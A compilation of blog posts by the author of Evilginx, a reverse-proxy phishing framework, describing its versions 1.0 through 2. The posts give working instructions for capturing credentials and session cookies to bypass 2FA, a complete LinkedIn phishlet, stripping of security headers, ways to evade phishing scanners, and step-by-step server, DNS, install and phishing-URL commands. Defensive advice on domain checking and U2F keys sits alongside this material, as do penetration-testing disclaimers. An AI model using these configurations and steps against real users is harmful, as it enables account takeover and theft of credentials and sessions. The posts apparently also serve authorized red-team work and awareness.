When the victim enters the credentials and is asked to provide a 2FA challenge answer, they are still talking to the real website, with Evilginx relaying the packets back and forth, sitting in the middle. Even while being phished, the victim will still receive the 2FA SMS code to his/her mobile phone, because he/she is talking to the real website (just through a relay).

Evilginx 2 - Next Generation of Phishing 2FA Tokens

After the 2FA challenge is completed by the victim and the website confirms its validity, website generates the session token, which it returns in form of a cookie. This cookie is intercepted by Evilginx and saved. Evilginx determines that authentication was a success and redirects the victim to any URL it was set up with (online document, video etc.).

At this point the attacker holds all the keys to the castle and is able to use the victim's account, fully bypassing 2FA protection, after importing the session token cookies into his web browser.

Be aware that: Every sign-in page, requiring the user to provide their password, with any form of 2FA implemented, can be phished using this technique!

How to protect yourself?

There is one major flaw in this phishing technique that anyone can and should exploit to protect themselves - the attacker must register their own domain.

By registering a domain, attacker will try to make it look as similar to real, legitimate domain as possible. For example if the attacker is targeting Facebook (real domain is facebook.com), they can, for example, register a domain faceboook.com or faceb00k.com, maximizing their chances that phished victims won't spot the difference in the browser's address bar.

That said - always check the legitimacy of website's base domain, visible in the address bar, if it asks you to provide any private information. By base domain I mean the one that precedes the top-level domain.

Evilginx 2 - Next Generation of Phishing 2FA Tokens

As an example, imagine this is the URL and the website, you arrived at, asks you to log into Facebook:

https://en-gb.facebook.cdn.global.faceboook.com/login.php

The top-level domain is .com and the base domain would be the preceeding word, with next . as a separator. Combined with TLD, that would be faceboook.com. When you verify that faceboook.com is not the real facebook.com, you will know that someone is trying to phish you.

As a side note - Green lock icon seen next to the URL, in the browser's address bar, does not mean that you are safe!

Green lock icon only means that the website you've arrived at, encrypts the transmission between you and the server, so that no-one can eavesdrop on your communication. Attackers can easily obtain SSL/TLS certificates for their phishing sites and give you a false sense of security with the ability to display the green lock icon as well.

Figuring out if the base domain you see is valid, sometimes may not be easy and leaves room for error. It became even harder with the support of Unicode characters in domain names. This made it possible for attackers to register domains with special characters (e.g. in Cyrillic) that would be lookalikes of their Latin counterparts. This technique recieved a name of a homograph attack.

As a quick example, an attacker could register a domain facebooĸ.com, which would look pretty convincing even though it was a completely different domain name (ĸ is not really k). It got even worse with other Cyrillic characters, allowing for ebаy.com vs ebay.com. The first one has an Cyrillic counterpart for a character, which looks exactly the same.

Major browsers were fast to address the problem and added special filters to prevent domain names from being displayed in Unicode, when suspicious characters were detected.

If you are interested in how it works, check out the IDN spoofing filter source code of the Chrome browser.

Now you see that verifying domains visually is not always the best solution, especially for big companies, where it often takes just one employee to get phished and allow attackers to steal vast amounts of data.

This is why FIDO Alliance introduced U2F (Universal 2nd Factor Authentication) to allow for unphishable 2nd factor authentication.

In short, you have a physical hardware key on which you just press a button when the website asks you to. Additionally it may ask you for account password or a complementary 4 digit PIN. The website talks directly with the hardware key plugged into your USB port, with the web browser as the channel provider for the communication.

Evilginx 2 - Next Generation of Phishing 2FA Tokens

What is different with this form of authentication, is that U2F protocol is designed to take the website's domain as one of the key components in negotiating the handshake. This means that if the domain in the browser's address bar, does not match the domain used in the data transmission between the website and the U2F device, the communication will simply fail. This solution leaves no room for error and is totally unphishable using Evilginx method.

Citing the vendor of U2F devices - Yubico (who co-developed U2F with Google):

With the YubiKey, user login is bound to the origin, meaning that only the real site can authenticate with the key. The authentication will fail on the fake site even if the user was fooled into thinking it was real. This greatly mitigates against the increasing volume and sophistication of phishing attacks and stops account takeovers.

It is important to note here that Markus Vervier (@marver) and Michele Orrù (@antisnatchor) did demonstrate a technique on how an attacker can attack U2F devices using the newly implemented WebUSB feature in modern browsers (which allows websites to talk with USB connected devices). It is also important to mention that Yubico, the creator of popular U2F devices YubiKeys, tried to steal credit for their research, which they later apologized for.

You can find the list of all websites supporting U2F authentication here.

Coinciding with the release of Evilginx 2, WebAuthn is coming out in all major web browsers. It will introduce the new FIDO2 password-less authentication standard to every browser. Chrome, Firefox and Edge are about to receive full support for it.

To wrap up - if you often need to log into various services, make your life easier and get a U2F device! This will greatly improve your accounts' security.

Under the hood

Interception of HTTP packets is possible since Evilginx acts as an HTTP server talking to the victim's browser and, at the same time, acts as an HTTP client for the website where the data is being relayed to. To make it possible, the victim has to be contacting Evilginx server through a custom phishing URL that will point to Evilginx server. Simply forwarding packets from victim to destination website would not work well and that's why Evilginx has to do some on-the-fly modifications.

In order for the phishing experience to be seamless, the proxy overcomes the following obstacles:

1. Making sure that the victim is not redirected to phished website's true domain.

Since the phishing domain will differ from the legitimate domain, used by phished website, relayed scripts and HTML data have to be carefully modified to prevent unwanted redirection of victim's web browser. There will be HTML submit forms pointing to legitimate URLs, scripts making AJAX requests or JSON objects containing URLs.

Ideally the most reliable way to solve it would be to perform regular expression string substitution for any occurrence of https://legit-site.com and replacing it with https://our-phishing-site.com. Unfortunately this is not always the case and it requires some trial and error kung-fu, working with web inspector to track down all strings the proxy needs to replace to not break website's functionality. If target website uses multiple options for 2FA, each route has to be inspected and analyzed.

For example, there are JSON objects transporting escaped URLs like https:\/\/legit-site.com. You can see that this will definitely not trigger the regexp mentioned above. If you replaced all occurrences of legit-site.com you may break something by accident.

2. Responding to DNS requests for multiple subdomains.

Websites will often make requests to multiple subdomains under their official domain or even use a totally different domain. In order to proxy these transmissions, Evilginx has to map each of the custom subdomains to its own IP address.

Previous version of Evilginx required the user to set up their own DNS server (e.g. bind) and set up DNS zones to properly handle DNS A requests. This generated a lot of headache on the user part and was only easier if the hosting provider (like Digital Ocean) provided an easy-to-use admin panel for setting up DNS zones.

With Evilginx 2 this issue is gone. Evilginx now runs its own in-built DNS server, listening on port 53, which acts as a nameserver for your domain. All you need to do is set up the nameserver addresses for your domain (ns1.yourdomain.com and ns2.yourdomain.com) to point to your Evilginx server IP, in the admin panel of your domain hosting provider. Evilginx will handle the rest on its own.

3. Modification of various HTTP headers.

Evilginx modifies HTTP headers sent to and received from the destination website. In particular the Origin header, in AJAX requests, will always hold the URL of the requesting site in order to comply with CORS. Phishing sites will hold a phishing URL as an origin. When request is forwarded, the destination website will receive an invalid origin and will not respond to such request. Not replacing the phishing hostname with the legitimate one in the request would make it also easy for the website to notice suspicious behavior. Evilginx automatically changes Origin and Referer fields on-the-fly to their legitimate counterparts.

Same way, to avoid any conflicts with CORS from the other side, Evilginx makes sure to set the Access-Control-Allow-Origin header value to * (if it exists in the response) and removes any occurrences of Content-Security-Policy headers. This guarantees that no request will be restricted by the browser when AJAX requests are made.

Other header to modify is Location, which is set in HTTP 302 and 301 responses to redirect the browser to different location. Naturally the value will come with legitimate website URL and Evilginx makes sure this location is properly switched to corresponding phishing hostname.

4. Cookies filtering.

It is common for websites to manage cookies for various purposes. Each cookie is assigned to a specific domain. Web browser's task is to automatically send the stored cookie, with every request to the domain, the cookie was assigned to. Cookies are also sent as HTTP headers, but I decided to make a separate mention of them here, due to their importance. Example cookie sent from the website to client's web browser would look like this:

Set-Cookie: qwerty=219ffwef9w0f; Domain=legit-site.com; Path=/; Expires=Wed, 30 Aug 2019 00:00:00 GMT

As you can see the cookie will be set in client's web browser for legit-site.com domain. Since the phishing victim is only talking to the phishing website with domain our-phishing-site.com, such cookie will never be saved in the browser, because of the fact the cookie domain differs from the one the browser is communicating with. Evilginx will parse every occurrence of Set-Cookie in HTTP response headers and modify the domain, replacing it with the phishing one, as follows:

Set-Cookie: qwerty=219ffwef9w0f; Domain=our-phishing-site.com; Path=/;

Evilginx will also remove expiration date from cookies, if the expiration date does not indicate that the cookie should be deleted from browser's cache.

Evilginx also sends its own cookies to manage the victim's session. These cookies are filtered out from every HTTP request, to prevent them from being sent to the destination website.

5. SSL splitting.

As the whole world of world-wide-web migrates to serving pages over secure HTTPS connections, phishing pages can't be any worse. Whenever you pick a hostname for your phishing page (e.g. totally.not.fake.linkedin.our-phishing-domain.com), Evilginx will automatically obtain a valid SSL/TLS certificate from LetsEncrypt and provide responses to ACME challenges, using the in-built HTTP server.

This makes sure that victims will always see a green lock icon next to the URL address bar, when visiting the phishing page, comforting them that everything is secured using "military-grade" encryption!

6. Anti-phishing tricks

There are rare cases where websites would employ defenses against being proxied. One of such defenses I uncovered during testing is using javascript to check if window.location contains the legitimate domain. These detections may be easy or hard to spot and much harder to remove, if additional code obfuscation is involved.

Improvements

The greatest advantage of Evilginx 2 is that it is now a standalone console application. There is no need to compile and install custom version of nginx, which I admit was not a simple feat. I am sure that using nginx site configs to utilize proxy_pass feature for phishing purposes was not what HTTP server's developers had in mind, when developing the software.

Evilginx 2 - Next Generation of Phishing 2FA Tokens

Evilginx 1 was pretty much a combination of several dirty hacks, duct taped together. Nonetheless it somehow worked!

Additionally to fully responsive console UI, here are the greatest improvements:

Tokenized phishing URLs

In previous version of Evilginx, entering just the hostname of your phishing URL address in the browser, with root path (e.g. https://totally.not.fake.linkedin.our-phishing-domain.com/), would still proxy the connection to the legitimate website. This turned out to be an issue, as I found out during development of Evilginx 2. Apparently once you obtain SSL/TLS certificates for the domain/hostname of your choice, external scanners start scanning your domain. Scanners gonna scan.

The scanners use public certificate transparency logs to scan, in real-time, all domains which have obtained valid SSL/TLS certifcates. With public libraries like CertStream, you can easily create your own scanner.

Evilginx 2 - Next Generation of Phishing 2FA Tokens

For some phishing pages, it took usually one hour for the hostname to become banned and blacklisted by popular anti-spam filters like Spamhaus. After I had three hostnames blacklisted for one domain, the whole domain got blocked. Three strikes and you're out!

I began thinking how such detection can be evaded. Easiest solution was to reply with faked response to every request for path /, but that would not work if scanners probed for any other path.

Then I decided that each phishing URL, generated by Evilginx, should come with a unique token in the URL as a GET parameter.

For example, Evilginx responds with redirection response when scanner makes a request to URL:

https://totally.not.fake.linkedin.our-phishing-domain.com/auth/signin

But it responds with proxied phishing page, instead, when the URL is properly tokenized, with a valid token:

https://totally.not.fake.linkedin.our-phishing-domain.com/auth/signin?tk=secret_l33t_token

When tokenized URL is opened, Evilginx sets a validation cookie in victim's browser, whitelisting all subsequent requests, even for the non-tokenized ones.

This works very well, but there is still risk that scanners will eventually scan tokenized phishing URLs when these get out into the interwebz.

Hiding your phishlets

This thought provoked me to find a solution that allows manual control over when the phishing proxy should respond with proxied website and when it should not. As a result, you can hide and unhide the phishign page whenever you want. Hidden phishing page will respond with a redirection 302 HTTP code, redirecting the requester to predefined URL (Rick Astley's famous clip on Youtube is the default).

Temporarily hiding your phishlet may be useful when you want to use a URL shortener, to shorten your phishing URL (like goo.gl or bit.ly) or when you are sending the phishing URL via email and you don't want to trigger any email scanners, on the way.

Phishlets

Phishlets are new site configs. They are plain-text ruleset files, in YAML format, which are fed into the Evilginx engine. Phishlets define which subdomains are needed to properly proxy a specific website, what strings should be replaced in relayed packets and which cookies should be captured, to properly take over the victim's account. There is one phishlet for each phished website. You can deploy as many phishlets as you want, with each phishlet set up for a different website. Phishlets can be enabled and disabled as you please and at any point Evilginx can be running and managing any number of them.

I will do a better job than I did last time, when I released Evilginx 1, and I will try to explain the structure of a phishlet and give you brief insight into how phishlets are created (I promise to release a separate blog post about it later!).

I will dissect the LinkedIn phishlet for the purpose of this short guide:

name: 'linkedin'
author: '@mrgretzky'
min_ver: '2.0.0'
proxy_hosts:
  - {
    phish_sub: 'www',
    orig_sub: 'www',
	domain: 'linkedin.com',
	session: true,
	is_landing: true
	}
sub_filters:
  - {
    hostname: 'www.linkedin.com',
	sub: 'www',
	domain: 'linkedin.com',
	search: 'action="https://{hostname}',
	replace: 'action="https://{hostname}',
	mimes: ['text/html', 'application/json']
	}
  - {
    hostname: 'www.linkedin.com',
	sub: 'www',
	domain: 'linkedin.com',
	search: 'href="https://{hostname}',
	replace: 'href="https://{hostname}',
	mimes: ['text/html', 'application/json']
	}
  - {
    hostname: 'www.linkedin.com',
	sub: 'www',
	domain: 'linkedin.com',
	search: '//{hostname}/nhome/',
	replace: '//{hostname}/nhome/',
	mimes: ['text/html', 'application/json']
	}
auth_tokens:
  - domain: 'www.linkedin.com'
    keys: ['li_at']
user_regex:
  key: 'session_key'
  re: '(.*)'
pass_regex:
  key: 'session_password'
  re: '(.*)'
landing_path:
  - '/uas/login'

First things first. I advise you to get familiar with YAML syntax to avoid any errors when editing or creating your own phishlets.

Starting off with simple and rather self-explanatory variables. name is the name of the phishlet, which would usually be the name of the phished website. author is where you can do some self promotion - this will be visible in Evilginx's UI when the phishlet is loaded. version is currently not supported, but will be very likely used when phishlet format changes in future releases of Evilginx, to provide some way of checking phishlet's compatibility with current tool's version.

Following that, we have proxy_hosts. This array holds an array of sub-domains that Evilginx will manage. This provides an array of all hostnames for which you want to intercept the transmission and gives you the capability to make on-the-fly packet modifications.

  • phish_sub : subdomain name that will be prefixed in the phishlet's hostname. I advise to leave it the same as the original subdomain name, due to issues that may arise later when doing string replacements properly, as it often requires additional work to support custom subdomain names.
  • orig_sub : the original subdomain name as used on the legitimate website.
  • domain : website's domain that we are targeting.
  • session : set this to true ONLY for subdomains that will return authentication cookies. This indicates which subdomain Evilginx should recognize as the one that will initiate the creation of Evilginx session and sets Evilginx session cookie for the domain name of this entry.
  • is_landing : set this to true if you want this subdomain to be used in generation of phishing URLs later.

In the LinkedIn example, we only have one subdomain that we need to support, which is www. The phishing hostname for this subdomain will then be: www.totally.not.fake.linkedin.our-phishing-domain.com.

Next are sub_filters, which tell Evilginx all about string substitution magics.

  • hostname : original hostname of the website, for which the substitution will take place.
  • sub : subdomain name from the original hostname. This is will be only used as a helper string in substitutions that I will explain below.
  • domain : domain name of the original hostname. Same as sub - used as a helper string in substitutions.
  • search : the regular expression of what to search for in HTTP packet's body. You can use some variables in {...} that Evilginx will prefill for you. I listed all supported variables below.
  • replace : the string that will act as a replacement for all occurrences of search regular expression matches. {...} variables are also supported here.
  • mimes : an array of MIME types that will only be considered before doing search and replace. Any of these defined MIME types must show up in Content-Type header of the HTTP response, before Evilginx considers to do any substitutions, for that packet. Most common MIME types to use here are: text/html, application/json, application/javascript or text/javascript.
  • redirect_only : use this sub_filter only if redirection URL is set in generated phishing URL (true or false).

The following is a list of bracket variables that you can use in search and replace parameters:

  • {hostname} : a combination of subdomain, defined by sub parameter, and a domain, defined by domain parameter. In search field it will be translated to the original website's hostname (e.g. www.linkedin.com). In the replace field, it will be translated to corresponding phishing hostname of matching proxy_hosts entry (e.g. www.totally.not.fake.linkedin.our-phishing-domain.com).
  • {subdomain} : same as {hostname} but only for the subdomain.
  • {domain} : same as {hostname} but only for the domain.
  • {domain_regexp} : same as {domain} but translates to properly escaped regular expression string. This can sometimes be useful when replacing anti-phishing protections in javascript, that try to verify if window.location contains the legitimate domain.
  • {hostname_regexp} : same as above, but for the hostname.
  • {subdomain_regexp} : same as above, but for the subdomain.

In the example we have:

  - {
    hostname: 'www.linkedin.com',
	sub: 'www',
	domain: 'linkedin.com',
	search: 'action="https://{hostname}',
	replace: 'action="https://{hostname}',
	mimes: ['text/html', 'application/json']
	}

This will make Evilginx search for packets with Content-Type of text/html or application/json and look for occurrences of action="https://www\.linkedin\.com (properly escaped regexp). If found, it will replace every occurrence with action="https://www.totally.not.fake.linkedin.our-phishing-domain.com.

As you can see this will replace the action URL of the login HTML form to have it point to Evilginx server, so that the victim does not stray off the phishing path.

That was the most complicated part. Now it should be pretty straight forward.

Next up are auth_tokens. This is where you define the cookies that should be captured on successful login, which combined together provide the full state of the website's captured session. The cookies defined here, when obtained, can later be imported to any browser (using this extension in Chrome) and allow to be immediately logged into the victim's account, bypassing any 2FA challenges.

  • domain : original domain for which the cookies will be saved for.
  • keys : array of cookie names that should be captured.

In the example, there is only one cookie that LinkedIn uses to verify the session's state. Only li_at cookie, saved for www.linkedin.com domain will be captured and stored.

Once Evilginx captures all of the defined cookies, it will display a message that authentication was successful and will store them in the database.

The two following parameters are similar user_regex and pass_regex. These define the POST request keys that should be searched for occurrences of usernames and passwords. Searching is defined by a regular expression that is ran against the contents of the POST request's key value.

  • key : name of the POST request key.
  • re : regular expression defining what data should be captured from the key's value (e.g. (.*) will capture the whole value)

Last parameter is landing_path array, which holds URL paths to login pages (usually one), of the phished website.

In our example, there is /uas/login which would translate to https://www.totally.not.fake.linkedin.our-phishing-domain.com/uas/login for the generated phishing URL.

Hope that sheds some light on how you can create your own phishlets and should help you understand the ones that are already shipped with Evilginx in the ./phishlets directory.

Future development

I'd like to continue working on Evilginx 2 and there are some things I have in mind that I want to eventually implement.

One of such things is serving an HTML page instead of 302 redirect for hidden phishlets. This could be a page imitating CloudFlare's "checking your browser" that would wait in a loop and redirect, to the phishing page, as soon as you unhide your phishlet.

Evilginx 2 - Next Generation of Phishing 2FA Tokens

Another thing to have at some point is to have Evilginx launch as a daemon, without the UI.

Update: You can find out about version 2.1 release here

Business Inquiries

If you are a red teaming company interested in development of custom phishing solutions, drop me a line and I will be happy to assist in any way I can.

If you are giving presentations on flaws of 2FA and/or promoting the use of FIDO U2F/FIDO2 devices, I'd love to hear how Evilginx can help you raise awareness.

In any case, send me an email at: [email protected]

I'll respond as soon as I can!

Credits

Since the release of Evilginx 1, in April last year, a lot has changed in my life for the better. I met a lot of wonderful, talented people, in front of whom I could exercise my impostor syndrome!

I'd like to thank few people without whom this release would not have been possible:

@evilsocket - for letting me know that Evilginx is awesome, inspiring me to learn GO and for developing so many incredible products that I could steal borrow code from!

@antisnatchor and @h0wlu - for organizing WarCon and for inviting me!

@juliocesarfort and @Mario_Vilas - for organizing AlligatorCon and for being great reptiles!

@x33fcon - for organizing x33fcon and letting me do all these lightning talks!

Vincent Yiu (@vysecurity) - for all the red tips and invitations to secret security gatherings!

Kevin Mitnick (@kevinmitnick) - for giving Evilginx a try and making me realize its importance!

@i_bo0om - for giving me an idea to play with nginx's proxy_pass feature in his post.

Cristofaro Mune (@pulsoid) & Denis Laskov (@it4sec) - for spending their precious time to hear out my concerns about releasing such tool to the public.

Giuseppe "Ohpe" Trotta (@Giutro) - for a heads up that there may be other similar tools lurking around in the darkness ;)

#apt - everyone I met there, for sharing amazing contributions.

**Thank you!**

That's it! Thanks for being able to read this overly long post!
Enjoy the tool and I'm waiting for your feedback!
[>> Follow me on Twitter <](https:>
[>> Download Evilginx 2 from GitHub <](https:>

Evilginx 1.1 Release

Evilginx 1.1 Release

Hello! Today I am bringing you another release of Evilginx with more bug fixes and added features. The development is going very well and the feedback from you is terrific. I've managed to address most of the requests you sent me on GitHub and I hope to address even more in the future.

If you don't know what Evilginx is, feel free to check out the first post, where I explain the subject in detail.

You can go straight to Evilginx project page on GitHub here:
>> Evilginx 1.1 on GitHub <<

Disclaimer

I am aware that Evilginx can be used for very nefarious purposes. This work is merely a demonstration of what adept attackers can and will do. It is the defender's responsibility to take such attacks into consideration, when setting up defenses, and find ways to protect against this phishing method.

Evilginx should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.


Version 1.1

Here is the list of biggest improvements in version 1.1:

iCloud.com support

New site config was added that allows to proxy the login process of the iCloud page. This one also performs some on-the-fly modification of Javascript content to disable several domain verifications. By far, this site config was the hardest to develop.

Live.com support

Site config for Outlook/Hotmail page was added. It is fairly simple and should prove as good reference for creating your own templates.

Added support for custom SSL/TLS certificates

If you don't want to use LetsEncrypt SSL/TLS certificates, you can now specify your own public certificates and private keys when enabling the site config:

./evilginx.py setup --enable <site_name> -d <domain> --crt <path_to_public_cert_file> --key <path_to_private_key_file>
Evilginx will remember your site options

You don't have to specify the domain name or certificate paths every time you want to update your site config using --enable parameter. If the site config was enabled and set up, previously, options will be stored in the .config file. All you need to do is enable the site config:

./evilginx.py setup --enable <site_name>
Added script that updates Nginx configuration files

From now on, after every update of Evilginx, you should execute ./update.sh script that will make sure, that your Nginx configuration files are up to date. Fixes were made, in this version, to allow the web server to receive big upstream responses and allow to use long hostnames (now you can specify very long chain of subdomains for your phishing hostnames).

Fixed rare issue with parsing requests from log files

There was a known issue, specifically with using the Google site config. If the user put in their email address into the form in 1st step of the login process and shortly after, the parsing script would launch (by default it launches every minute) and truncated the log file, the intercepted email address would be lost forever, just before the user was about to enter their password.
Issue was fixed by leaving behind custom information with last known parsed email for specific IP address, in the log file, for the next parser execution.

How to update?

You can always find the latest version of Evilginx on GitHub:
>> Evilginx 1.1 on GitHub <<

# pull latest changes from GitHub
git pull
# run update script to make sure your Nginx configuration files are up-to-date
./update.sh
# re-enable every site config you may have been using to update them to their latest versions
./evilginx.py setup --enable <site_name>

Changelog

[+] Added iCloud.com support.
[+] Added Live.com support.
[+] Specifying domain name with 'setup --enable' is now optional if site was enabled before.
[+] Added ability to specify custom SSL/TLS certificates with --crt and --key arguments.
    Custom certificates will be remembered and can be removed with --use_letsencrypt parameter.
[+] Added 'server_names_hash_bucket_size: 128' to support long hostnames.
[+] Fixed rare issue, which could be triggered when only visitor's email was identified at the time
    of truncating logs, after parsing, breaking the chain of logged requests, which would miss an
    email address on next parse.
[+] Fixed several typos in site config files. (@poweroftrue)
[+] Fixed issue with Nginx proxy bailing out on receiving too big upstream responses.
[+] Fixed issue with Facebook overwriting redirection cookie with 'deleted' (@poweroftrue)
[+] Fixed "speedbump" redirection for Google site config that asks user to provide his phone number.
[+] Fixed bug that would raise exception when disabling site configs without them being enabled first.
[+] Nginx access_log directory can now be changed with VAR_LOGS constant in evilginx.py.
[+] Added 'update.sh' file which should be executed after every 'git pull' to update nginx config files.
[+] Added Dockerfile

Epilogue

I have added a development branch on GitHub where you can monitor all the latest changes. I make sure that this branch is as stable as it can get, but still minor bugs may appear, before they are put to rest. If you have any pull requests of your own, please make sure to apply them to this branch.

Development branch can be found here:
Evilginx development branch

If you have any suggestions, ideas or feedback, make sure to post them in the comments section, but it is even better to post them under issues on GitHub.

I am constantly looking for interesting projects to work on!

Do not hesitate to contact me if you happen to be working on projects that require:

  • Reverse Engineering
  • Development of Security Software
  • Web / Mobile Application Penetration Testing
  • Offensive Tools for Red Team Assessments

Hit me up on Twitter @mrgretzky or directly via e-mail at [email protected].

Enjoy and see you soon!

Evilginx 1.0 Update - Up Your Game in 2FA Phishing

Evilginx 1.0 Update - Up Your Game in 2FA Phishing

Welcome back! It's been just a couple of weeks since Evilginx release and I'm already swimming in amazing feedback. This encouraged me to spend more time on this project and make it better. The first release was more of a proof of concept, but now I want to make it a full-blown framework, which is going to be easily expandable. In other words, Evilginx is getting modular architecture, easy installation and support for lots of new site templates.

If you want to learn more about Evilginx and how it works, please refer to the previous post, which you can find here.

Looking just for the tool? You can always find it on GitHub at its most current version:
https://github.com/kgretzky/evilginx

Disclaimer: This project is released for educational purposes and should be used only in legitimate penetration testing assignments with written permission from to-be-phished parties.

Evilginx v.1.0 release

This week I'm releasing the product of several weeks of work, which is an official 1.0 release. I've redone some code and put whole Evilginx's functionality into a single script file. Directory structure was reorganized to fit the modular architecture a bit more. From now, site config templates, creds config files and additional config files are organized into separate directories. It should now be easy to add your own templates just by creating new directory in sites directory and populating it with necessary config files. Evilginx will automatically detect site config presence by scanning the directory.

To summarize, here is the list of major additions and fixes:

New site config template system

As mentioned above, the new system makes it very easy to organize site templates and create new ones. All templates should be placed in separate directories under the sites directory.

One-shot fire & forget installation script (Debian only)

No more will you have to perform tedious, manual work like compiling OpenResty, setting up Nginx daemon and gluing all parts together. From now on, the whole Evilginx package can be installed by simply executing install.sh script, which you can find in project's root directory.

Evilginx.py script to setup, parse logs and generate URLs

In root directory you will find evilginx.py script, which, from now on, will act as the command center. It will install/uninstall site configs that you want to enable/disable in Nginx. It will parse the logs, harvesting login credentials and session cookies, while putting them into separate logs directory. It will also generate phishing URLs for you with specified redirection URL, which is now base64 encoded to make it less obvious.

The script, when enabling site templates, will even allow you to set up log parsing to launch every minute. Additionally, it will do the hard job for you by obtaining LetsEncrypt SSL/TLS certificates and it will automatically renew them, keeping them valid for eternity.

New site templates for popular websites

In order to figure out and introduce the structure for modular architecture, I had to create several new templates for new sites. This allowed me to design the base for every template as a foundation of the new template system.

Here is the list of new site config templates, which were introduced with this release:

  • Facebook
  • Dropbox
  • Linkedin
  • New Google sign-in page

While preparing these, I've encountered several obstacles, that I had to overcome using custom bypasses in LUA code.

Dropbox, for example, had an anti-CSRF protection that required the t parameter to be of same value as the t cookie sent with the same POST request. The POST t value was not set automatically by javascript code if site's URL differed from dropbox.com and that had to be fixed with custom LUA code.

Facebook uses two versions of their site - for desktop and for mobile. If mobile device is detected, user is redirected to m.facebook.com domain, which had to be proxied by adding additional site config file.

New Google sign-in page retrieved external javascript files from ssl.gstatic.com domain, which had to be proxied separately. Otherwise no data was retrieved from the domain, due to strict Access-Control-Allow-Origin rules that disallowed requests from domains not recognized by Google.

If you are interested in creating your own site templates, you may find the included ones very helpful in analyzing how to bypass possible issues you may encounter.


Here is the full CHANGELOG:

version 1.0 :
[+] Created central script for handling setup, parsing and generating urls.
[+] Added install.sh script that will single-handedly install Evilginx package on Debian.
[+] Added support for adding external site templates in framework-like manner.
[+] Added sites support for following websites: Facebook, Dropbox, Linkedin and new Google sign-in page.
[+] Reorganized code and directory structure to be more accessible for future development.
[+] Redirection URLs can now be embedded into phishing URLs using base64 encoding.
[+] Setup script allows to enable automatic logs parsing every minute.
[+] Setup script automatically handles SSL/TLS certificate retrieval from LetsEncrypt and its renewal.
[+] Added regular expressions for parsing POST arguments via .creds config files.
[+] Fixed: Opening Evilginx site via HTTP will now properly redirect to HTTPS.
[+] Fixed: 'Origin' and 'Referal' HTTP headers are now properly modified.
[+] Fixed: Minor bugs and stability issues.

Installation and Usage

I figured it would be wise to give you a rundown of updated Evilginx installation in a step by step manner, on a fresh VPS Debian 8 (jessie) server, which you can easily host on DigitalOcean (this link gives you $10 bonus).

Package installation

SSH to your new server, clone the Evilginx GitHub repository and launch the installation script:

apt-get update
apt-get -y install git
git clone https://github.com/kgretzky/evilginx.git
cd evilginx
chmod 700 install.sh
./install.sh

Note for previous Evilginx users: If you want to upgrade your installation, you may need to stop Nginx service first with service nginx stop. Afterwards, you can launch ./install.sh normally.

This should take a while. If all went well, you should be up and running with the whole Evilginx package installed and ready to rock. If it didn't, submit an issue to GitHub's project page and I will take a look.

Now, let's list all available site templates:

python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

For the sake of this tutorial, we will enable phishing site with google site configuration. At this moment you should have already registered a domain that you will use with Evilginx. Let's assume that domain is not-really-google.com. You can register your domain at NameCheap.

Domain setup

You should point your new domain to DigitalOcean's nameservers and specify the A record for your domain on DigitalOcean, which will point to your VPS IP address.

Now is the important part. The listing of available sites includes the subdomains information. This is the list of required subdomains that need to be included in your DNS zone configuration, for Evilgix site config to function properly.

You need to create one CNAME entry for each listed subdomain and point it to your registered domain. For example, google requires two CNAME entries:

  1. accounts.not-really.google.com which will point to not-really-google.com..
  2. ssl.not-really.google.com which will point to not-really-google.com..

If you do not know how to do any of this, refer to excellent tutorials on DigitalOcean:

  1. How to Point to DigitalOcean Nameservers From Common Domain Registrars
  2. How To Set Up a Host Name with DigitalOcean
Enabling site config

The domain should now be properly set up and all required subdomains should also be pointing at the right place. We can now enable google site configuration for Nginx.

python evilginx.py setup --enable google -d not-really-google.com

The -d not-really-google.com argument specifies the registered domain we own. Follow the prompts, answering Y to every question and Evilginx should enable log auto-parsing and automatically retrieve SSL/TLS certificates from LetsEncrypt using Certbot.

You should verify that all went well, otherwise, you may need to troubleshoot what went wrong and verify that your DNS zones are configured properly. You may also give few hours for DNS settings to propagate as it may not happen instantly.

Generating the phishing URLs

We will now generate our phishing URLs, which can be sent out:

python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ

The -r https://www.youtube.com/watch?v=dQw4w9WgXcQ argument specifies what URL the victim will be redirected to on successful login. In this scenario, it will be a rick'roll video.

As you can see, Evilginx generated two URLs. This is because one is for the old Google sign-in page and the other one is for the new one. You can pick one or the other.

Every minute, Evilginx will be parsing the logs. If anyone got phished and performed a successful login, his login credentials with session cookies will be saved in logs directory under Evilginx root directory.

Session cookies can be imported using EditThisCookie extension for Chrome. If you want to see the whole process, you may want to watch a slightly out-dated demonstration video of Evilginx (all is up-to-date except for shell commands):

Epilogue

I hope this update puts Evilginx on its path to greatness! From now on, I want to focus on adding support for more popular websites. If you happen to succeed in creating your own templates for Evilginx and you want to share, please contact me and I may put your template into official Evilginx repository.

I am constantly looking for interesting projects to work on!

Do not hesitate to contact me if you happen to be working on projects that require:

  • Reverse Engineering
  • Development of Security Software
  • Web / Mobile Application Penetration Testing
  • Offensive Tools for Red Team Assessments

If you have any feedback or suggestions, contact me via the comment section, via Twitter @mrgretzky or directly via e-mail at [email protected].

Evilginx GitHub Repository

https://github.com/kgretzky/evilginx

Follow me on Twitter if you want to stay up to date.

Stay tuned for more updates and other posts!

Evilginx - Advanced Phishing with Two-factor Authentication Bypass

Evilginx - Advanced Phishing with Two-factor Authentication Bypass

Welcome to my new post! Over the past several months I've been researching new phishing techniques that could be used in penetration testing assignments. Almost every assignment starts with grabbing the low-hanging fruit, which are often employees' credentials obtained via phishing.

In today's post I'm going to show you how to make your phishing campaigns look and feel the best way possible.

